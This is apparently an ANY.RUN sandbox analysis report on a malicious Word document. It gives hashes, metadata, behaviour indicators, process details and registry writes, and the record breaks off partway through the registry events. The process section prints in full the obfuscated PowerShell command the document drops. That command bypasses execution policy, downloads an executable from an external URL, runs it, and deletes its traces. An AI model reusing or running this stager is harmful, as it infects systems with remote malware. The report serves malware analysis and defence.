General Info

File name

e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e

Full analysis
https://app.any.run/tasks/03008759-02d7-454c-8611-acf7199b1cd8
Verdict
Malicious activity
Analysis date
7/18/2019, 09:25:44
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

generated-doc

Indicators:

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Eduard Schuchhardt B.A., Number of Characters: 2331, Create Time/Date: Tue Oct 2 00:48:18 2018, Last Saved Time/Date: Tue Oct 2 00:48:18 2018, Security: 0, Keywords: voluptate, earum, enim, Last Saved By: Eduard Schuchhardt B.A., Revision Number: 181519, Subject: Dokument N892778, Template: Normal, Title: Dokument N892778, Total Editing Time: 02:00, Number of Words: 2331, Number of Pages: 64, Comments: Deserunt dolorem natus quae vel quia.
MD5

b3b1760d2e5525a562f2d7a49c27ed93

SHA1

94be3e9b653ff9c2db2fea0a3ffb5f02e533d77e

SHA256

e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e

SSDEEP

3072:7AxB6T44CDZ803LyyK2CdWWDQKQ4k1aI2CyoPJf9J:7wN4Cl803eyK20WdKQ31vLyoPN9J

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
520 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 2372)
Application was dropped or rewritten from another process
  • VvoTw.exe (PID: 1784)
Executable content was dropped or overwritten
  • WINWORD.EXE (PID: 2372)
Reads the machine GUID from the registry
  • VvoTw.exe (PID: 1784)
Creates files in the user directory
  • WINWORD.EXE (PID: 2372)
Reads the machine GUID from the registry
  • WINWORD.EXE (PID: 2372)
Dropped object may contain Bitcoin addresses
  • WINWORD.EXE (PID: 2372)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2372)

Static information

TRiD
.doc | Microsoft Word document (33.9%)
EXIF
FlashPix
CompObjUserTypeLen:
39
CompObjUserType:
Microsoft Office Word 97-2003 Document
Software:
Microsoft Office Word
Author:
Eduard Schuchhardt B.A.
Characters:
2331
CreateDate:
2018:10:01 23:48:18
ModifyDate:
2018:10:01 23:48:18
Security:
None
Keywords:
voluptate, earum, enim
LastModifiedBy:
Eduard Schuchhardt B.A.
RevisionNumber:
181519
Subject:
Dokument N892778
Template:
Normal
Title:
Dokument N892778
TotalEditTime:
2.0 minutes
Words:
2331
Pages:
64
Comments:
Deserunt dolorem natus quae vel quia.
Paragraphs:
191
Bytes:
-2147483648
HiddenSlides:
-2147483648
Lines:
6422
Notes:
-2147483648
Slides:
-2147483648
Company:
Junck Matthäi OHG mbH
Manager:
Hertha Scholtz B.A.
Category:
sunt

Processes

Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

drop and start start winword.exe vvotw.exe no specs

Process information

PID
2372
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.5123.5000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\yzqhly\odqkhnur\vvotw.exe
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\program files\microsoft office\office14\msohev.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll

PID
1784
CMD
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe $NUiEp='\ow';$SxAuE='Obj';$uoea='force';$oxeee='($e';$vktvli='.Net.W';$jbigseylw0='y + ';$XMUMZWE4='te -';$XOWTI='pass ';$ieffuo='(1)';$eujnrw5='://ww';$sqjzsjlo='Pol';$toui='om/wp';$iuhki='Fil';$DvwlNy=' Pro';$yzlursyw='Execu';$vhxkqtzjk='+ ''\yz';$aexny='stem';$qkjrow='rt-';$KeOoB='art-';$BxuPiij76=''',$pa';$xelz='nv:t';$cnuosq20='h;Remo';$EYSIU='.Dow';$oaehcu='var';$cwoiead76='hy =';$ielme='Sta';$wola='qhly''';$YUElsi='Proc';$zspsuor='$path=';$euiiorl68='esn';$FFQBUPABR='en/in';$cvykcpzwy='eak;}}';$tdkgbiwo=' Get';$oaxzoto='UForm';$oosdikmy='twent';$gtzcid='%s;';$jyveey='e'');(';$atgmjml11='d){br';$qifhdo='; St';$zkuoap='https';$ywoy='ect Sy';$ycgvtzzj='ypw.ex';$zfgabei41='ebc';$hekuk='lie';$pwuqyi0=';';$BjAtpWpb='$nhb';$OumXqq10='ess $';$uyue1='ge $h';$EOIOEU='te -';$yeokke6='Sleep';$tgszrqz35=' -m ';$dazfse='s; ';$ZvpDZkuu='emes/';$EPUJVH4='11.11';$aukeue='Get-Da';$ycsxtafm=' = ';$ilaeyfv='tem ';$kkothu67='urs';$eufejwy='c/file';$ieaee='nload';$noxqa='e(''';$uewtnqv='f($e';$qrcttykg='tco.c';$zgyghao4='yfifte';$IIoxta='emp+''';$avgqknlogc='ve-I';$jklcieo='rialpe';$EZLui='$nhbh';$kjnjv='temp ';$ozhnqi51='($env:';$kluyxdm61=') -rec';$ucmntu='u -';$UuixWPz='e -';$ortdi=' $hva';$wbarkee40='{ $eu';$iuke='ces';$ukselzjd='-con';$acvasle='th)';$bovzcrf0='at ';$REPUUO='at ';$ycgjbp='pat';$qkmccflw='UForm';$qmroaxh='-Scope';$imcix='[do';$hxedwra='Set-';$muozz='tion';$flourh8=';while';$psae='/th';$xqkiobs='rd = ';$kvzxuue6='nt)';$cxlqiai='uble]';$GaUKeu0='535;i';$YFEegck='w.impe';$yuongdb='.exe';$feywlof='-Da';$bnnpujs='New-';$ogyvr='tent';$uuao8='icy By';$lyuzvkta='%s;'; Invoke-Expression 
($imcix+$cxlqiai+$BjAtpWpb+$cwoiead76+$tdkgbiwo+$feywlof+$EOIOEU+$oaxzoto+$bovzcrf0+$lyuzvkta+$ortdi+$xqkiobs+$EZLui+$jbigseylw0+$EPUJVH4+$flourh8+$ieffuo+$wbarkee40+$ycsxtafm+$aukeue+$XMUMZWE4+$qkmccflw+$REPUUO+$gtzcid+$ielme+$qkjrow+$yeokke6+$tgszrqz35+$GaUKeu0+$uewtnqv+$ucmntu+$uyue1+$oaehcu+$atgmjml11+$cvykcpzwy+$hxedwra+$yzlursyw+$muozz+$sqjzsjlo+$uuao8+$XOWTI+$qmroaxh+$DvwlNy+$iuke+$dazfse+$zspsuor+$oxeee+$xelz+$IIoxta+$NUiEp+$euiiorl68+$ycgvtzzj+$jyveey+$bnnpujs+$SxAuE+$ywoy+$aexny+$vktvli+$zfgabei41+$hekuk+$kvzxuue6+$EYSIU+$ieaee+$iuhki+$noxqa+$zkuoap+$eujnrw5+$YFEegck+$jklcieo+$qrcttykg+$toui+$ukselzjd+$ogyvr+$psae+$ZvpDZkuu+$oosdikmy+$zgyghao4+$FFQBUPABR+$eufejwy+$yuongdb+$BxuPiij76+$acvasle+$qifhdo+$KeOoB+$YUElsi+$OumXqq10+$ycgjbp+$cnuosq20+$avgqknlogc+$ilaeyfv+$ozhnqi51+$kjnjv+$vhxkqtzjk+$wola+$kluyxdm61+$kkothu67+$UuixWPz+$uoea+$pwuqyi0);
Path
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\appdata\local\temp\yzqhly\odqkhnur\vvotw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll

Registry activity

Total events
975
Read events
876
Write events
98
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2372
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
mh<
6D683C0044090000010000000000000000000000
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
1324482602
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482686
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482687
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
44090000DEF766103A3DD50100000000
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
?m<
3F6D3C004409000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
=p<
3D703C00440900000600000001000000C800000002000000B80000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C0065003300320039003400300063003500320061006500640033006200370038003700320036003700660034006200380064003500320038006100660039003700310030003800620034003600660035003200350034003500370038006300620061006100620032003000370036003800640039003800660035003800390065002E0064006F006300000000000000
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
1324482564
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{E6B49558-227D-4459-AD8E-A13318608A13}
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D53D3A122BDE40][O00000000]*C:\Users\admin\Desktop\
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D53D3A122E4F40][O00000000]*C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\13B5A8
13B5A8
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482609
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482610
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482609
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
C0AC079DA84B4CBD8DBAF1BB44146899
01000000270000007B39303134303030302D303033442D303030302D313030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482610
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482634
2372
